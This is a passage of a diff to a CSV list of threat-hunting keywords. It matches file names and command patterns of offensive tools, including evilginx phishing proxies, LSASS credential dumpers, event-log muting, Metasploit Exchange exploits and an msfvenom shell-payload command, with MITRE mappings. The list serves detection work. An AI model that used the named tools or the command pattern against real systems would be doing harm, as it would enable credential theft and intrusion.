Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" +"*evilfeed.go*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilginx*","offensive_tool_keyword","evilginx","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx.exe*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx2*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx-linux*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilginx-mastery*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilgophish*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" "*evilgrade*","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Frameworks","https://github.com/infobyte/evilgrade","1","0","N/A","N/A","10","1236","288","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z" -"*EvilLsassTwin.exe*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"*EvilLsassTwin.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*EvilLsassTwin.exe*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*EvilLsassTwin.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*evilmog/ntlmv1-multi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*EvilnoVNC-main*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*EvilnoVNC-main*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*eviloffice.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*EvilPayload.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*EvilPayload.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*evilqr-main*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-phishing*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-server*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilsocket*","offensive_tool_keyword","Github Username","github username of hacker known for sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/evilsocket","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*EvilTwin.dmp*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"*EvilTwinServer.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*EvilTwin.dmp*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*EvilTwinServer.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*evil-winrm -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*evil-winrm*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*evil-winrm*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.iobj*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" @@ -9990,13 +10139,13 @@ "*ewby/Mockingjay_BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*ewok -t *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","1","32","17","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z" "*example-bof.sln*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" -"*examples/netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*examples/netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*Excel-Exploit.git*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*Excel-Exploit-main*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*ExcelReflectImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*excelshellinject.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*exchange_proxylogon_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exchange_proxynotshell_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*exchange_proxylogon_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exchange_proxynotshell_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*exe_dll_shellcode genetic.config*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*exe_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*exe_to_dll.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" @@ -10011,43 +10160,45 @@ "*exe2powershell.cpp*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell.exe*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell-master*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" -"*exec CMD=/bin/sh -f elf -o *.elf*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exec_payload_msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exec_shellcode.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*exec CMD=/bin/sh -f elf -o *.elf*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Exec_Command_Silent.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Exec_Command_WithOutput.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*exec_payload_msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exec_shellcode.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security 